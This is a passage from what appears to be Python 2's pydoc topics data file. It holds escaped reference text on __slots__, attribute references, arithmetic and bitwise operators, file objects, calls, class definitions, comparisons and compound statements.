sequence of instance\n variable names.\n\n* Without a *__weakref__* variable for each instance, classes\n defining *__slots__* do not support weak references to its\n instances. If weak reference support is needed, then add\n "\'__weakref__\'" to the sequence of strings in the *__slots__*\n declaration.\n\n Changed in version 2.3: Previously, adding "\'__weakref__\'" to the\n *__slots__* declaration would not enable support for weak\n references.\n\n* *__slots__* are implemented at the class level by creating\n descriptors (Implementing Descriptors) for each variable name. As a\n result, class attributes cannot be used to set default values for\n instance variables defined by *__slots__*; otherwise, the class\n attribute would overwrite the descriptor assignment.\n\n* The action of a *__slots__* declaration is limited to the class\n where it is defined. As a result, subclasses will have a *__dict__*\n unless they also define *__slots__* (which must only contain names\n of any *additional* slots).\n\n* If a class defines a slot also defined in a base class, the\n instance variable defined by the base class slot is inaccessible\n (except by retrieving its descriptor directly from the base class).\n This renders the meaning of the program undefined. In the future, a\n check may be added to prevent this.\n\n* Nonempty *__slots__* does not work for classes derived from\n "variable-length" built-in types such as "long", "str" and "tuple".\n\n* Any non-string iterable may be assigned to *__slots__*. Mappings\n may also be used; however, in the future, special meaning may be\n assigned to the values corresponding to each key.\n\n* *__class__* assignment works only if both classes have the same\n *__slots__*.\n\n Changed in version 2.6: Previously, *__class__* assignment raised an\n error if either new or old class had *__slots__*.\n', 'attribute-references': u'\nAttribute references\n********************\n\nAn attribute reference is a primary followed by a period and a name:\n\n attributeref ::= primary "." identifier\n\nThe primary must evaluate to an object of a type that supports\nattribute references, e.g., a module, list, or an instance. This\nobject is then asked to produce the attribute whose name is the\nidentifier. If this attribute is not available, the exception\n"AttributeError" is raised. Otherwise, the type and value of the\nobject produced is determined by the object. Multiple evaluations of\nthe same attribute reference may yield different objects.\n', 'augassign': u'\nAugmented assignment statements\n*******************************\n\nAugmented assignment is the combination, in a single statement, of a\nbinary operation and an assignment statement:\n\n augmented_assignment_stmt ::= augtarget augop (expression_list | yield_expression)\n augtarget ::= identifier | attributeref | subscription | slicing\n augop ::= "+=" | "-=" | "*=" | "/=" | "//=" | "%=" | "**="\n | ">>=" | "<<=" | "&=" | "^=" | "|="\n\n(See section Primaries for the syntax definitions for the last three\nsymbols.)\n\nAn augmented assignment evaluates the target (which, unlike normal\nassignment statements, cannot be an unpacking) and the expression\nlist, performs the binary operation specific to the type of assignment\non the two operands, and assigns the result to the original target.\nThe target is only evaluated once.\n\nAn augmented assignment expression like "x += 1" can be rewritten as\n"x = x + 1" to achieve a similar, but not exactly equal effect. In the\naugmented version, "x" is only evaluated once. Also, when possible,\nthe actual operation is performed *in-place*, meaning that rather than\ncreating a new object and assigning that to the target, the old object\nis modified instead.\n\nWith the exception of assigning to tuples and multiple targets in a\nsingle statement, the assignment done by augmented assignment\nstatements is handled the same way as normal assignments. Similarly,\nwith the exception of the possible *in-place* behavior, the binary\noperation performed by augmented assignment is the same as the normal\nbinary operations.\n\nFor targets which are attribute references, the same caveat about\nclass and instance attributes applies as for regular assignments.\n', 'binary': u'\nBinary arithmetic operations\n****************************\n\nThe binary arithmetic operations have the conventional priority\nlevels. Note that some of these operations also apply to certain non-\nnumeric types. Apart from the power operator, there are only two\nlevels, one for multiplicative operators and one for additive\noperators:\n\n m_expr ::= u_expr | m_expr "*" u_expr | m_expr "//" u_expr | m_expr "/" u_expr\n | m_expr "%" u_expr\n a_expr ::= m_expr | a_expr "+" m_expr | a_expr "-" m_expr\n\nThe "*" (multiplication) operator yields the product of its arguments.\nThe arguments must either both be numbers, or one argument must be an\ninteger (plain or long) and the other must be a sequence. In the\nformer case, the numbers are converted to a common type and then\nmultiplied together. In the latter case, sequence repetition is\nperformed; a negative repetition factor yields an empty sequence.\n\nThe "/" (division) and "//" (floor division) operators yield the\nquotient of their arguments. The numeric arguments are first\nconverted to a common type. Plain or long integer division yields an\ninteger of the same type; the result is that of mathematical division\nwith the \'floor\' function applied to the result. Division by zero\nraises the "ZeroDivisionError" exception.\n\nThe "%" (modulo) operator yields the remainder from the division of\nthe first argument by the second. The numeric arguments are first\nconverted to a common type. A zero right argument raises the\n"ZeroDivisionError" exception. The arguments may be floating point\nnumbers, e.g., "3.14%0.7" equals "0.34" (since "3.14" equals "4*0.7 +\n0.34".) The modulo operator always yields a result with the same sign\nas its second operand (or zero); the absolute value of the result is\nstrictly smaller than the absolute value of the second operand [2].\n\nThe integer division and modulo operators are connected by the\nfollowing identity: "x == (x/y)*y + (x%y)". Integer division and\nmodulo are also connected with the built-in function "divmod()":\n"divmod(x, y) == (x/y, x%y)". These identities don\'t hold for\nfloating point numbers; there similar identities hold approximately\nwhere "x/y" is replaced by "floor(x/y)" or "floor(x/y) - 1" [3].\n\nIn addition to performing the modulo operation on numbers, the "%"\noperator is also overloaded by string and unicode objects to perform\nstring formatting (also known as interpolation). The syntax for string\nformatting is described in the Python Library Reference, section\nString Formatting Operations.\n\nDeprecated since version 2.3: The floor division operator, the modulo\noperator, and the "divmod()" function are no longer defined for\ncomplex numbers. Instead, convert to a floating point number using\nthe "abs()" function if appropriate.\n\nThe "+" (addition) operator yields the sum of its arguments. The\narguments must either both be numbers or both sequences of the same\ntype. In the former case, the numbers are converted to a common type\nand then added together. In the latter case, the sequences are\nconcatenated.\n\nThe "-" (subtraction) operator yields the difference of its arguments.\nThe numeric arguments are first converted to a common type.\n', 'bitwise': u'\nBinary bitwise operations\n*************************\n\nEach of the three bitwise operations has a different priority level:\n\n and_expr ::= shift_expr | and_expr "&" shift_expr\n xor_expr ::= and_expr | xor_expr "^" and_expr\n or_expr ::= xor_expr | or_expr "|" xor_expr\n\nThe "&" operator yields the bitwise AND of its arguments, which must\nbe plain or long integers. The arguments are converted to a common\ntype.\n\nThe "^" operator yields the bitwise XOR (exclusive OR) of its\narguments, which must be plain or long integers. The arguments are\nconverted to a common type.\n\nThe "|" operator yields the bitwise (inclusive) OR of its arguments,\nwhich must be plain or long integers. The arguments are converted to\na common type.\n', 'bltin-code-objects': u'\nCode Objects\n************\n\nCode objects are used by the implementation to represent "pseudo-\ncompiled" executable Python code such as a function body. They differ\nfrom function objects because they don\'t contain a reference to their\nglobal execution environment. Code objects are returned by the built-\nin "compile()" function and can be extracted from function objects\nthrough their "func_code" attribute. See also the "code" module.\n\nA code object can be executed or evaluated by passing it (instead of a\nsource string) to the "exec" statement or the built-in "eval()"\nfunction.\n\nSee The standard type hierarchy for more information.\n', 'bltin-ellipsis-object': u'\nThe Ellipsis Object\n*******************\n\nThis object is used by extended slice notation (see Slicings). It\nsupports no special operations. There is exactly one ellipsis object,\nnamed "Ellipsis" (a built-in name).\n\nIt is written as "Ellipsis". When in a subscript, it can also be\nwritten as "...", for example "seq[...]".\n', 'bltin-file-objects': u'\nFile Objects\n************\n\nFile objects are implemented using C\'s "stdio" package and can be\ncreated with the built-in "open()" function. File objects are also\nreturned by some other built-in functions and methods, such as\n"os.popen()" and "os.fdopen()" and the "makefile()" method of socket\nobjects. Temporary files can be created using the "tempfile" module,\nand high-level file operations such as copying, moving, and deleting\nfiles and directories can be achieved with the "shutil" module.\n\nWhen a file operation fails for an I/O-related reason, the exception\n"IOError" is raised. This includes situations where the operation is\nnot defined for some reason, like "seek()" on a tty device or writing\na file opened for reading.\n\nFiles have the following methods:\n\nfile.close()\n\n Close the file. A closed file cannot be read or written any more.\n Any operation which requires that the file be open will raise a\n "ValueError" after the file has been closed. Calling "close()"\n more than once is allowed.\n\n As of Python 2.5, you can avoid having to call this method\n explicitly if you use the "with" statement. For example, the\n following code will automatically close *f* when the "with" block\n is exited:\n\n from __future__ import with_statement # This isn\'t required in Python 2.6\n\n with open("hello.txt") as f:\n for line in f:\n print line,\n\n In older versions of Python, you would have needed to do this to\n get the same effect:\n\n f = open("hello.txt")\n try:\n for line in f:\n print line,\n finally:\n f.close()\n\n Note: Not all "file-like" types in Python support use as a\n context manager for the "with" statement. If your code is\n intended to work with any file-like object, you can use the\n function "contextlib.closing()" instead of using the object\n directly.\n\nfile.flush()\n\n Flush the internal buffer, like "stdio"\'s "fflush()". This may be\n a no-op on some file-like objects.\n\n Note: "flush()" does not necessarily write the file\'s data to\n disk. Use "flush()" followed by "os.fsync()" to ensure this\n behavior.\n\nfile.fileno()\n\n Return the integer "file descriptor" that is used by the underlying\n implementation to request I/O operations from the operating system.\n This can be useful for other, lower level interfaces that use file\n descriptors, such as the "fcntl" module or "os.read()" and friends.\n\n Note: File-like objects which do not have a real file descriptor\n should *not* provide this method!\n\nfile.isatty()\n\n Return "True" if the file is connected to a tty(-like) device, else\n "False".\n\n Note: If a file-like object is not associated with a real file,\n this method should *not* be implemented.\n\nfile.next()\n\n A file object is its own iterator, for example "iter(f)" returns\n *f* (unless *f* is closed). When a file is used as an iterator,\n typically in a "for" loop (for example, "for line in f: print\n line.strip()"), the "next()" method is called repeatedly. This\n method returns the next input line, or raises "StopIteration" when\n EOF is hit when the file is open for reading (behavior is undefined\n when the file is open for writing). In order to make a "for" loop\n the most efficient way of looping over the lines of a file (a very\n common operation), the "next()" method uses a hidden read-ahead\n buffer. As a consequence of using a read-ahead buffer, combining\n "next()" with other file methods (like "readline()") does not work\n right. However, using "seek()" to reposition the file to an\n absolute position will flush the read-ahead buffer.\n\n New in version 2.3.\n\nfile.read([size])\n\n Read at most *size* bytes from the file (less if the read hits EOF\n before obtaining *size* bytes). If the *size* argument is negative\n or omitted, read all data until EOF is reached. The bytes are\n returned as a string object. An empty string is returned when EOF\n is encountered immediately. (For certain files, like ttys, it\n makes sense to continue reading after an EOF is hit.) Note that\n this method may call the underlying C function "fread()" more than\n once in an effort to acquire as close to *size* bytes as possible.\n Also note that when in non-blocking mode, less data than was\n requested may be returned, even if no *size* parameter was given.\n\n Note: This function is simply a wrapper for the underlying\n "fread()" C function, and will behave the same in corner cases,\n such as whether the EOF value is cached.\n\nfile.readline([size])\n\n Read one entire line from the file. A trailing newline character\n is kept in the string (but may be absent when a file ends with an\n incomplete line). [6] If the *size* argument is present and non-\n negative, it is a maximum byte count (including the trailing\n newline) and an incomplete line may be returned. When *size* is not\n 0, an empty string is returned *only* when EOF is encountered\n immediately.\n\n Note: Unlike "stdio"\'s "fgets()", the returned string contains\n null characters ("\'\\0\'") if they occurred in the input.\n\nfile.readlines([sizehint])\n\n Read until EOF using "readline()" and return a list containing the\n lines thus read. If the optional *sizehint* argument is present,\n instead of reading up to EOF, whole lines totalling approximately\n *sizehint* bytes (possibly after rounding up to an internal buffer\n size) are read. Objects implementing a file-like interface may\n choose to ignore *sizehint* if it cannot be implemented, or cannot\n be implemented efficiently.\n\nfile.xreadlines()\n\n This method returns the same thing as "iter(f)".\n\n New in version 2.1.\n\n Deprecated since version 2.3: Use "for line in file" instead.\n\nfile.seek(offset[, whence])\n\n Set the file\'s current position, like "stdio"\'s "fseek()". The\n *whence* argument is optional and defaults to "os.SEEK_SET" or "0"\n (absolute file positioning); other values are "os.SEEK_CUR" or "1"\n (seek relative to the current position) and "os.SEEK_END" or "2"\n (seek relative to the file\'s end). There is no return value.\n\n For example, "f.seek(2, os.SEEK_CUR)" advances the position by two\n and "f.seek(-3, os.SEEK_END)" sets the position to the third to\n last.\n\n Note that if the file is opened for appending (mode "\'a\'" or\n "\'a+\'"), any "seek()" operations will be undone at the next write.\n If the file is only opened for writing in append mode (mode "\'a\'"),\n this method is essentially a no-op, but it remains useful for files\n opened in append mode with reading enabled (mode "\'a+\'"). If the\n file is opened in text mode (without "\'b\'"), only offsets returned\n by "tell()" are legal. Use of other offsets causes undefined\n behavior.\n\n Note that not all file objects are seekable.\n\n Changed in version 2.6: Passing float values as offset has been\n deprecated.\n\nfile.tell()\n\n Return the file\'s current position, like "stdio"\'s "ftell()".\n\n Note: On Windows, "tell()" can return illegal values (after an\n "fgets()") when reading files with Unix-style line-endings. Use\n binary mode ("\'rb\'") to circumvent this problem.\n\nfile.truncate([size])\n\n Truncate the file\'s size. If the optional *size* argument is\n present, the file is truncated to (at most) that size. The size\n defaults to the current position. The current file position is not\n changed. Note that if a specified size exceeds the file\'s current\n size, the result is platform-dependent: possibilities include that\n the file may remain unchanged, increase to the specified size as if\n zero-filled, or increase to the specified size with undefined new\n content. Availability: Windows, many Unix variants.\n\nfile.write(str)\n\n Write a string to the file. There is no return value. Due to\n buffering, the string may not actually show up in the file until\n the "flush()" or "close()" method is called.\n\nfile.writelines(sequence)\n\n Write a sequence of strings to the file. The sequence can be any\n iterable object producing strings, typically a list of strings.\n There is no return value. (The name is intended to match\n "readlines()"; "writelines()" does not add line separators.)\n\nFiles support the iterator protocol. Each iteration returns the same\nresult as "readline()", and iteration ends when the "readline()"\nmethod returns an empty string.\n\nFile objects also offer a number of other interesting attributes.\nThese are not required for file-like objects, but should be\nimplemented if they make sense for the particular object.\n\nfile.closed\n\n bool indicating the current state of the file object. This is a\n read-only attribute; the "close()" method changes the value. It may\n not be available on all file-like objects.\n\nfile.encoding\n\n The encoding that this file uses. When Unicode strings are written\n to a file, they will be converted to byte strings using this\n encoding. In addition, when the file is connected to a terminal,\n the attribute gives the encoding that the terminal is likely to use\n (that information might be incorrect if the user has misconfigured\n the terminal). The attribute is read-only and may not be present\n on all file-like objects. It may also be "None", in which case the\n file uses the system default encoding for converting Unicode\n strings.\n\n New in version 2.3.\n\nfile.errors\n\n The Unicode error handler used along with the encoding.\n\n New in version 2.6.\n\nfile.mode\n\n The I/O mode for the file. If the file was created using the\n "open()" built-in function, this will be the value of the *mode*\n parameter. This is a read-only attribute and may not be present on\n all file-like objects.\n\nfile.name\n\n If the file object was created using "open()", the name of the\n file. Otherwise, some string that indicates the source of the file\n object, of the form "<...>". This is a read-only attribute and may\n not be present on all file-like objects.\n\nfile.newlines\n\n If Python was built with *universal newlines* enabled (the default)\n this read-only attribute exists, and for files opened in universal\n newline read mode it keeps track of the types of newlines\n encountered while reading the file. The values it can take are\n "\'\\r\'", "\'\\n\'", "\'\\r\\n\'", "None" (unknown, no newlines read yet) or\n a tuple containing all the newline types seen, to indicate that\n multiple newline conventions were encountered. For files not opened\n in universal newlines read mode the value of this attribute will be\n "None".\n\nfile.softspace\n\n Boolean that indicates whether a space character needs to be\n printed before another value when using the "print" statement.\n Classes that are trying to simulate a file object should also have\n a writable "softspace" attribute, which should be initialized to\n zero. This will be automatic for most classes implemented in\n Python (care may be needed for objects that override attribute\n access); types implemented in C will have to provide a writable\n "softspace" attribute.\n\n Note: This attribute is not used to control the "print"\n statement, but to allow the implementation of "print" to keep\n track of its internal state.\n', 'bltin-null-object': u'\nThe Null Object\n***************\n\nThis object is returned by functions that don\'t explicitly return a\nvalue. It supports no special operations. There is exactly one null\nobject, named "None" (a built-in name).\n\nIt is written as "None".\n', 'bltin-type-objects': u'\nType Objects\n************\n\nType objects represent the various object types. An object\'s type is\naccessed by the built-in function "type()". There are no special\noperations on types. The standard module "types" defines names for\nall standard built-in types.\n\nTypes are written like this: "<type \'int\'>".\n', 'booleans': u'\nBoolean operations\n******************\n\n or_test ::= and_test | or_test "or" and_test\n and_test ::= not_test | and_test "and" not_test\n not_test ::= comparison | "not" not_test\n\nIn the context of Boolean operations, and also when expressions are\nused by control flow statements, the following values are interpreted\nas false: "False", "None", numeric zero of all types, and empty\nstrings and containers (including strings, tuples, lists,\ndictionaries, sets and frozensets). All other values are interpreted\nas true. (See the "__nonzero__()" special method for a way to change\nthis.)\n\nThe operator "not" yields "True" if its argument is false, "False"\notherwise.\n\nThe expression "x and y" first evaluates *x*; if *x* is false, its\nvalue is returned; otherwise, *y* is evaluated and the resulting value\nis returned.\n\nThe expression "x or y" first evaluates *x*; if *x* is true, its value\nis returned; otherwise, *y* is evaluated and the resulting value is\nreturned.\n\n(Note that neither "and" nor "or" restrict the value and type they\nreturn to "False" and "True", but rather return the last evaluated\nargument. This is sometimes useful, e.g., if "s" is a string that\nshould be replaced by a default value if it is empty, the expression\n"s or \'foo\'" yields the desired value. Because "not" has to invent a\nvalue anyway, it does not bother to return a value of the same type as\nits argument, so e.g., "not \'foo\'" yields "False", not "\'\'".)\n', 'break': u'\nThe "break" statement\n*********************\n\n break_stmt ::= "break"\n\n"break" may only occur syntactically nested in a "for" or "while"\nloop, but not nested in a function or class definition within that\nloop.\n\nIt terminates the nearest enclosing loop, skipping the optional "else"\nclause if the loop has one.\n\nIf a "for" loop is terminated by "break", the loop control target\nkeeps its current value.\n\nWhen "break" passes control out of a "try" statement with a "finally"\nclause, that "finally" clause is executed before really leaving the\nloop.\n', 'callable-types': u'\nEmulating callable objects\n**************************\n\nobject.__call__(self[, args...])\n\n Called when the instance is "called" as a function; if this method\n is defined, "x(arg1, arg2, ...)" is a shorthand for\n "x.__call__(arg1, arg2, ...)".\n', 'calls': u'\nCalls\n*****\n\nA call calls a callable object (e.g., a *function*) with a possibly\nempty series of *arguments*:\n\n call ::= primary "(" [argument_list [","]\n | expression genexpr_for] ")"\n argument_list ::= positional_arguments ["," keyword_arguments]\n ["," "*" expression] ["," keyword_arguments]\n ["," "**" expression]\n | keyword_arguments ["," "*" expression]\n ["," "**" expression]\n | "*" expression ["," keyword_arguments] ["," "**" expression]\n | "**" expression\n positional_arguments ::= expression ("," expression)*\n keyword_arguments ::= keyword_item ("," keyword_item)*\n keyword_item ::= identifier "=" expression\n\nA trailing comma may be present after the positional and keyword\narguments but does not affect the semantics.\n\nThe primary must evaluate to a callable object (user-defined\nfunctions, built-in functions, methods of built-in objects, class\nobjects, methods of class instances, and certain class instances\nthemselves are callable; extensions may define additional callable\nobject types). All argument expressions are evaluated before the call\nis attempted. Please refer to section Function definitions for the\nsyntax of formal *parameter* lists.\n\nIf keyword arguments are present, they are first converted to\npositional arguments, as follows. First, a list of unfilled slots is\ncreated for the formal parameters. If there are N positional\narguments, they are placed in the first N slots. Next, for each\nkeyword argument, the identifier is used to determine the\ncorresponding slot (if the identifier is the same as the first formal\nparameter name, the first slot is used, and so on). If the slot is\nalready filled, a "TypeError" exception is raised. Otherwise, the\nvalue of the argument is placed in the slot, filling it (even if the\nexpression is "None", it fills the slot). When all arguments have\nbeen processed, the slots that are still unfilled are filled with the\ncorresponding default value from the function definition. (Default\nvalues are calculated, once, when the function is defined; thus, a\nmutable object such as a list or dictionary used as default value will\nbe shared by all calls that don\'t specify an argument value for the\ncorresponding slot; this should usually be avoided.) If there are any\nunfilled slots for which no default value is specified, a "TypeError"\nexception is raised. Otherwise, the list of filled slots is used as\nthe argument list for the call.\n\n**CPython implementation detail:** An implementation may provide\nbuilt-in functions whose positional parameters do not have names, even\nif they are \'named\' for the purpose of documentation, and which\ntherefore cannot be supplied by keyword. In CPython, this is the case\nfor functions implemented in C that use "PyArg_ParseTuple()" to parse\ntheir arguments.\n\nIf there are more positional arguments than there are formal parameter\nslots, a "TypeError" exception is raised, unless a formal parameter\nusing the syntax "*identifier" is present; in this case, that formal\nparameter receives a tuple containing the excess positional arguments\n(or an empty tuple if there were no excess positional arguments).\n\nIf any keyword argument does not correspond to a formal parameter\nname, a "TypeError" exception is raised, unless a formal parameter\nusing the syntax "**identifier" is present; in this case, that formal\nparameter receives a dictionary containing the excess keyword\narguments (using the keywords as keys and the argument values as\ncorresponding values), or a (new) empty dictionary if there were no\nexcess keyword arguments.\n\nIf the syntax "*expression" appears in the function call, "expression"\nmust evaluate to an iterable. Elements from this iterable are treated\nas if they were additional positional arguments; if there are\npositional arguments *x1*, ..., *xN*, and "expression" evaluates to a\nsequence *y1*, ..., *yM*, this is equivalent to a call with M+N\npositional arguments *x1*, ..., *xN*, *y1*, ..., *yM*.\n\nA consequence of this is that although the "*expression" syntax may\nappear *after* some keyword arguments, it is processed *before* the\nkeyword arguments (and the "**expression" argument, if any -- see\nbelow). So:\n\n >>> def f(a, b):\n ... print a, b\n ...\n >>> f(b=1, *(2,))\n 2 1\n >>> f(a=1, *(2,))\n Traceback (most recent call last):\n File "<stdin>", line 1, in ?\n TypeError: f() got multiple values for keyword argument \'a\'\n >>> f(1, *(2,))\n 1 2\n\nIt is unusual for both keyword arguments and the "*expression" syntax\nto be used in the same call, so in practice this confusion does not\narise.\n\nIf the syntax "**expression" appears in the function call,\n"expression" must evaluate to a mapping, the contents of which are\ntreated as additional keyword arguments. In the case of a keyword\nappearing in both "expression" and as an explicit keyword argument, a\n"TypeError" exception is raised.\n\nFormal parameters using the syntax "*identifier" or "**identifier"\ncannot be used as positional argument slots or as keyword argument\nnames. Formal parameters using the syntax "(sublist)" cannot be used\nas keyword argument names; the outermost sublist corresponds to a\nsingle unnamed argument slot, and the argument value is assigned to\nthe sublist using the usual tuple assignment rules after all other\nparameter processing is done.\n\nA call always returns some value, possibly "None", unless it raises an\nexception. How this value is computed depends on the type of the\ncallable object.\n\nIf it is---\n\na user-defined function:\n The code block for the function is executed, passing it the\n argument list. The first thing the code block will do is bind the\n formal parameters to the arguments; this is described in section\n Function definitions. When the code block executes a "return"\n statement, this specifies the return value of the function call.\n\na built-in function or method:\n The result is up to the interpreter; see Built-in Functions for the\n descriptions of built-in functions and methods.\n\na class object:\n A new instance of that class is returned.\n\na class instance method:\n The corresponding user-defined function is called, with an argument\n list that is one longer than the argument list of the call: the\n instance becomes the first argument.\n\na class instance:\n The class must define a "__call__()" method; the effect is then the\n same as if that method was called.\n', 'class': u'\nClass definitions\n*****************\n\nA class definition defines a class object (see section The standard\ntype hierarchy):\n\n classdef ::= "class" classname [inheritance] ":" suite\n inheritance ::= "(" [expression_list] ")"\n classname ::= identifier\n\nA class definition is an executable statement. It first evaluates the\ninheritance list, if present. Each item in the inheritance list\nshould evaluate to a class object or class type which allows\nsubclassing. The class\'s suite is then executed in a new execution\nframe (see section Naming and binding), using a newly created local\nnamespace and the original global namespace. (Usually, the suite\ncontains only function definitions.) When the class\'s suite finishes\nexecution, its execution frame is discarded but its local namespace is\nsaved. [4] A class object is then created using the inheritance list\nfor the base classes and the saved local namespace for the attribute\ndictionary. The class name is bound to this class object in the\noriginal local namespace.\n\n**Programmer\'s note:** Variables defined in the class definition are\nclass variables; they are shared by all instances. To create instance\nvariables, they can be set in a method with "self.name = value". Both\nclass and instance variables are accessible through the notation\n""self.name"", and an instance variable hides a class variable with\nthe same name when accessed in this way. Class variables can be used\nas defaults for instance variables, but using mutable values there can\nlead to unexpected results. For *new-style class*es, descriptors can\nbe used to create instance variables with different implementation\ndetails.\n\nClass definitions, like function definitions, may be wrapped by one or\nmore *decorator* expressions. The evaluation rules for the decorator\nexpressions are the same as for functions. The result must be a class\nobject, which is then bound to the class name.\n\n-[ Footnotes ]-\n\n[1] The exception is propagated to the invocation stack unless\n there is a "finally" clause which happens to raise another\n exception. That new exception causes the old one to be lost.\n\n[2] Currently, control "flows off the end" except in the case of\n an exception or the execution of a "return", "continue", or\n "break" statement.\n\n[3] A string literal appearing as the first statement in the\n function body is transformed into the function\'s "__doc__"\n attribute and therefore the function\'s *docstring*.\n\n[4] A string literal appearing as the first statement in the class\n body is transformed into the namespace\'s "__doc__" item and\n therefore the class\'s *docstring*.\n', 'comparisons': u'\nComparisons\n***********\n\nUnlike C, all comparison operations in Python have the same priority,\nwhich is lower than that of any arithmetic, shifting or bitwise\noperation. Also unlike C, expressions like "a < b < c" have the\ninterpretation that is conventional in mathematics:\n\n comparison ::= or_expr ( comp_operator or_expr )*\n comp_operator ::= "<" | ">" | "==" | ">=" | "<=" | "<>" | "!="\n | "is" ["not"] | ["not"] "in"\n\nComparisons yield boolean values: "True" or "False".\n\nComparisons can be chained arbitrarily, e.g., "x < y <= z" is\nequivalent to "x < y and y <= z", except that "y" is evaluated only\nonce (but in both cases "z" is not evaluated at all when "x < y" is\nfound to be false).\n\nFormally, if *a*, *b*, *c*, ..., *y*, *z* are expressions and *op1*,\n*op2*, ..., *opN* are comparison operators, then "a op1 b op2 c ... y\nopN z" is equivalent to "a op1 b and b op2 c and ... y opN z", except\nthat each expression is evaluated at most once.\n\nNote that "a op1 b op2 c" doesn\'t imply any kind of comparison between\n*a* and *c*, so that, e.g., "x < y > z" is perfectly legal (though\nperhaps not pretty).\n\nThe forms "<>" and "!=" are equivalent; for consistency with C, "!="\nis preferred; where "!=" is mentioned below "<>" is also accepted.\nThe "<>" spelling is considered obsolescent.\n\nThe operators "<", ">", "==", ">=", "<=", and "!=" compare the values\nof two objects. The objects need not have the same type. If both are\nnumbers, they are converted to a common type. Otherwise, objects of\ndifferent types *always* compare unequal, and are ordered consistently\nbut arbitrarily. You can control comparison behavior of objects of\nnon-built-in types by defining a "__cmp__" method or rich comparison\nmethods like "__gt__", described in section Special method names.\n\n(This unusual definition of comparison was used to simplify the\ndefinition of operations like sorting and the "in" and "not in"\noperators. In the future, the comparison rules for objects of\ndifferent types are likely to change.)\n\nComparison of objects of the same type depends on the type:\n\n* Numbers are compared arithmetically.\n\n* Strings are compared lexicographically using the numeric\n equivalents (the result of the built-in function "ord()") of their\n characters. Unicode and 8-bit strings are fully interoperable in\n this behavior. [4]\n\n* Tuples and lists are compared lexicographically using comparison\n of corresponding elements. This means that to compare equal, each\n element must compare equal and the two sequences must be of the same\n type and have the same length.\n\n If not equal, the sequences are ordered the same as their first\n differing elements. For example, "cmp([1,2,x], [1,2,y])" returns\n the same as "cmp(x,y)". If the corresponding element does not\n exist, the shorter sequence is ordered first (for example, "[1,2] <\n [1,2,3]").\n\n* Mappings (dictionaries) compare equal if and only if their sorted\n (key, value) lists compare equal. [5] Outcomes other than equality\n are resolved consistently, but are not otherwise defined. [6]\n\n* Most other objects of built-in types compare unequal unless they\n are the same object; the choice whether one object is considered\n smaller or larger than another one is made arbitrarily but\n consistently within one execution of a program.\n\nThe operators "in" and "not in" test for collection membership. "x in\ns" evaluates to true if *x* is a member of the collection *s*, and\nfalse otherwise. "x not in s" returns the negation of "x in s". The\ncollection membership test has traditionally been bound to sequences;\nan object is a member of a collection if the collection is a sequence\nand contains an element equal to that object. However, it make sense\nfor many other object types to support membership tests without being\na sequence. In particular, dictionaries (for keys) and sets support\nmembership testing.\n\nFor the list and tuple types, "x in y" is true if and only if there\nexists an index *i* such that "x == y[i]" is true.\n\nFor the Unicode and string types, "x in y" is true if and only if *x*\nis a substring of *y*. An equivalent test is "y.find(x) != -1".\nNote, *x* and *y* need not be the same type; consequently, "u\'ab\' in\n\'abc\'" will return "True". Empty strings are always considered to be a\nsubstring of any other string, so """ in "abc"" will return "True".\n\nChanged in version 2.3: Previously, *x* was required to be a string of\nlength "1".\n\nFor user-defined classes which define the "__contains__()" method, "x\nin y" is true if and only if "y.__contains__(x)" is true.\n\nFor user-defined classes which do not define "__contains__()" but do\ndefine "__iter__()", "x in y" is true if some value "z" with "x == z"\nis produced while iterating over "y". If an exception is raised\nduring the iteration, it is as if "in" raised that exception.\n\nLastly, the old-style iteration protocol is tried: if a class defines\n"__getitem__()", "x in y" is true if and only if there is a non-\nnegative integer index *i* such that "x == y[i]", and all lower\ninteger indices do not raise "IndexError" exception. (If any other\nexception is raised, it is as if "in" raised that exception).\n\nThe operator "not in" is defined to have the inverse true value of\n"in".\n\nThe operators "is" and "is not" test for object identity: "x is y" is\ntrue if and only if *x* and *y* are the same object. "x is not y"\nyields the inverse truth value. [7]\n', 'compound': u'\nCompound statements\n*******************\n\nCompound statements contain (groups of) other statements; they affect\nor control the execution of those other statements in some way. In\ngeneral, compound statements span multiple lines, although in simple\nincarnations a whole compound statement may be contained in one line.\n\nThe "if", "while" and "for" statements implement traditional control\nflow constructs. "try" specifies exception handlers and/or cleanup\ncode for a group of statements. Function and class definitions are\nalso syntactically compound statements.\n\nCompound statements consist of one or more \'clauses.\' A clause\nconsists of a header and a \'suite.\' The clause headers of a\nparticular compound statement are all at the same indentation level.\nEach clause header begins with a uniquely identifying keyword and ends\nwith a colon. A suite is a group of statements controlled by a\nclause. A suite can be one or more semicolon-separated simple\nstatements on the same line as the header, following the header\'s\ncolon, or it can be one or more indented statements on subsequent\nlines. Only the latter form of suite can contain nested compound\nstatements; the following is illegal, mostly because it wouldn\'t be\nclear to which "if" clause a following "else" clause would belong:\n\n if test1: if test2: print x\n\nAlso note that the semicolon binds tighter than the colon in this\ncontext, so that in the following example, either all or none of the\n"print" statements are executed:\n\n if x < y < z: print x; print y; print z\n\nSummarizing:\n\n compound_stmt ::= if_stmt\n | while_stmt\n | for_stmt\n | try_stmt\n | with_stmt\n | funcdef\n | classdef\n | decorated\n suite ::= stmt_list NEWLINE | NEWLINE INDENT statement+ DEDENT\n statement ::= stmt_list NEWLINE | compound_stmt\n stmt_list ::= simple_stmt (";" simple_stmt)* [";"]\n\nNote that statements always end in a "NEWLINE" possibly followed by a\n"DEDENT". Also note that optional continuation clauses always begin\nwith a keyword that cannot start a statement, thus there are no\nambiguities (the \'dangling "else"\' problem is solved in Python by\nrequiring nested "if" statements to be indented).\n\nThe formatting of the grammar rules in the following sections places\neach clause on a separate line for clarity.\n\n\nThe "if" statement\n==================\n\nThe "if" statement is used for conditional execution:\n\n if_stmt ::= "if" expression ":" suite\n ( "elif" expression ":" suite )*\n ["else" ":" suite]\n\nIt selects exactly one of the suites by evaluating the expressions one\nby one until one is found to be true (see section Boolean operations\nfor the definition of true and false); then that suite is executed\n(and no other part of the "if" statement is executed or evaluated).\nIf all expressions are false, the suite of the "else" clause, if\npresent, is executed.\n\n\nThe "while" statement\n=====================\n\nThe "while" statement is used for repeated execution as long as an\nexpression is true:\n\n while_stmt ::= "while" expression ":" suite\n ["else" ":" suite]\n\nThis repeatedly tests the expression and, if it is true, executes the\nfirst suite; if the expression is false (which may be the first time\nit is tested) the suite of the "else" clause, if present, is executed\nand the loop terminates.\n\nA "break" statement executed in the first suite terminates the loop\nwithout executing the "else" clause\'s suite. A "continue" statement\nexecuted in the first suite skips the rest of the suite and goes back\nto testing the expression.\n\n\nThe "for" statement\n===================\n\nThe "for" statement is used to iterate over the elements of a sequence\n(such as a string, tuple or list) or other iterable object:\n\n 